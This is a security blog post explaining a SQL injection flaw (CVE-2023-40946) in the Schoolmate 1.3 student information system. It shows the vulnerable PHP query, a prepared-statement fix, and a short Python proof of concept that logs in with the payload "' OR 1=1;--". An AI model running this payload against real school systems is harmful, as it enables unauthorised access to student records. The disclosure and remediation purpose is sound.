Schoolmate is a simple PHP-based student information system used by schools around the world. In this article, we’ll uncover a serious security flaw in Schoolmate version 1.3, identified as CVE-2023-40946. This vulnerability is an SQL Injection that affects the $username variable sourced from a PHP session in the ValidateLogin.php script. We’ll walk through where the problem lies, demonstrate how it can be exploited, and share advice on how to fix it.
---
1. What’s the Problem?
Schoolmate 1.3 uses a login mechanism in ValidateLogin.php. After login, the $username is stored in a session variable. This session variable is later used directly inside an SQL query without any sanitization or escaping. That’s exactly where the SQL Injection happens.
Let's look at the relevant portion from ValidateLogin.php:

```php
<?php
session_start();
// The username is read back from the session exactly as it was stored at login.
$username = $_SESSION['username'];
// The value is interpolated straight into the SQL string: no escaping, no parameter binding.
$query = "SELECT * FROM users WHERE username='$username'";
$result = mysql_query($query);
?>
```
Notice: The value of $username from the session is placed straight into the SQL query and sent for execution. If someone manages to control the session variable (through a separate flaw, or simply by supplying a crafted username at login, since that input isn't cleaned), arbitrary SQL can be run!
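For comparison, here is an added example (not Schoolmate's own code) of how the same login check can be written so the username never becomes part of the SQL text. It assumes a PDO/MySQL connection and a `users` table with `username` and `password_hash` columns; the DSN, credentials and the `password_hash` column are assumptions.

```php
<?php
// Added example, not code from Schoolmate 1.3.
session_start();

// Emulated prepares are disabled so the MySQL server itself keeps the query
// text and the bound parameter values separate. DSN and credentials are assumed.
$pdo = new PDO('mysql:host=localhost;dbname=schoolmate;charset=utf8mb4', 'app', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

/**
 * Validate submitted credentials. The username is passed as a bound parameter,
 * so a value such as "' OR 1=1;--" is compared literally against the column
 * instead of changing the query. The password_hash column is an assumption.
 */
function validateLogin(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE username = ? LIMIT 1');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Compare against a stored password_hash() digest, never a plaintext value.
    return $row !== false && password_verify($password, $row['password_hash']);
}

$username = (string)($_POST['username'] ?? '');
$password = (string)($_POST['password'] ?? '');

if (validateLogin($pdo, $username, $password)) {
    // Only a username that actually authenticated is stored in the session,
    // and the session id is rotated so a pre-set id cannot be reused.
    session_regenerate_id(true);
    $_SESSION['username'] = $username;
} else {
    unset($_SESSION['username']);
}

// Any later page that reads $_SESSION['username'] must still bind it as a
// parameter: session data is derived from user input and is not trusted.
$lookup = $pdo->prepare('SELECT * FROM users WHERE username = ?');
$lookup->execute([$_SESSION['username'] ?? '']);
$user = $lookup->fetch(PDO::FETCH_ASSOC);
```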
---
Normally, the login system should validate and clean this, but in Schoolmate 1.3, the input just gets stored in the session.
Trigger the Vulnerable Query
Each time ValidateLogin.php runs, it pulls the unchanged value from the session and builds the vulnerable SQL.
Here’s a simplified Python script that mimics the attack using HTTP requests and session handling:

```python
import requests

# Reuse one session so the cookie set at login is sent on the follow-up request.
s = requests.Session()

# Step 1: Login with a malicious username
payload = "' OR 1=1;--"
data = {
    "username": payload,
    "password": "fakepassword"
}
s.post("http://schoolmate.example.com/login.php", data=data)

# Step 2: Access the vulnerable page, which rebuilds the query from the session value
resp = s.get("http://schoolmate.example.com/ValidateLogin.php")
print(resp.text)
```
3. Original References
- CVE-2023-40946 detail at NVD
- Schoolmate source code (archived)
- OWASP SQL Injection Exploit Guide
- Full exploit disclosure by Security Researcher (PacketStorm)
5. Summary
SQL Injection in Schoolmate 1.3 (CVE-2023-40946) is serious. Exploiting the $username variable from session lets attackers run arbitrary SQL, break into student records, and cause havoc. If you run Schoolmate, fix this today to protect your school and your students.
Stay safe and keep your code secure!
*Written by: SecurityTechCorner*
*Date: June 2024*
Timeline
Published on: 09/11/2023 20:15:10 UTC
Last modified on: 09/13/2023 03:49:05 UTC